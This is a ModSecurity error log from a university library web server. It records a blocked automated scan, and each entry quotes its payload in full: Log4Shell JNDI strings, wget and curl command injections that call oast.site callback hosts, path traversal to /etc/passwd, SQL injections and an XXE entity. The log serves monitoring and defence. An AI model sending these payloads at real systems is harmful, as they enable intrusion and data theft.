[Tue Aug 29 11:31:18.330626 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAPDn5kAAAAP"]
[Tue Aug 29 11:31:18.400341 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgydkgxnfws8bb3.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAP8Gy4AAAAV"]
[Tue Aug 29 11:31:20.384425 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQOv0kAAAAw"]
[Tue Aug 29 11:31:22.529177 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "digilibfh.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQDFTAAAAAl"]
[Tue Aug 29 11:31:23.323678 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAO88BcAAAAF"]
[Tue Aug 29 11:31:24.641985 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgpwshab7gs8wh1.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQEGH4AAAAm"]
[Tue Aug 29 11:31:25.314325 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlgdoj4esmze4jt9.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAQFcR4AAAAn"]
[Tue Aug 29 11:31:26.723689 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgkdnyjk6dhsc5p.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAPMmI0AAAAY"]
[Tue Aug 29 11:31:27.566890 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAP@MzAAAAAZ"]
[Tue Aug 29 11:31:28.310281 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10oMCo-f0AAAPMmI8AAAAY"]
[Tue Aug 29 11:31:29.307523 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQgqUEAAAAA"]
[Tue Aug 29 11:31:29.400127 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAP6NNwAAAAQ"]
[Tue Aug 29 11:31:29.495402 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQMrrMAAAAu"]
[Tue Aug 29 11:31:29.564766 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAQOv2kAAAAw"]
[Tue Aug 29 11:31:30.326310 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQFcS4AAAAn"]
[Tue Aug 29 11:31:31.372749 2023] [:error] [pid 1056] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgob7tmafueiz3u.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQgqUgAAAAA"]
[Tue Aug 29 11:31:32.408911 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQMrsAAAAAu"]
[Tue Aug 29 11:31:33.335741 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgyr7f5nqjreshs.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQEGJgAAAAm"]
[Tue Aug 29 11:31:33.558220 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQJWtwAAAAr"]
[Tue Aug 29 11:31:34.399007 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQkBVsAAAAC"]
[Tue Aug 29 11:31:35.380611 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQJWusAAAAr"]
[Tue Aug 29 11:31:36.382774 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQUH-cAAAA2"]
[Tue Aug 29 11:31:36.396650 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgdg738y4xj5re6.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAN@5HAAAAAO"]
[Tue Aug 29 11:31:37.343416 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAPah1MAAAAL"]
[Tue Aug 29 11:31:37.457666 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQlGRMAAAAF"]
[Tue Aug 29 11:31:38.298786 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlg5dtjnn9bt6saf.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAQJWvcAAAAr"]
[Tue Aug 29 11:31:38.454932 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgbo8qcz9kqkzhc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQEGLwAAAAm"]
[Tue Aug 29 11:31:38.594919 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQlGRoAAAAF"]
[Tue Aug 29 11:31:39.411426 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgab77kkbhs58ei.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQmR4kAAAAH"]
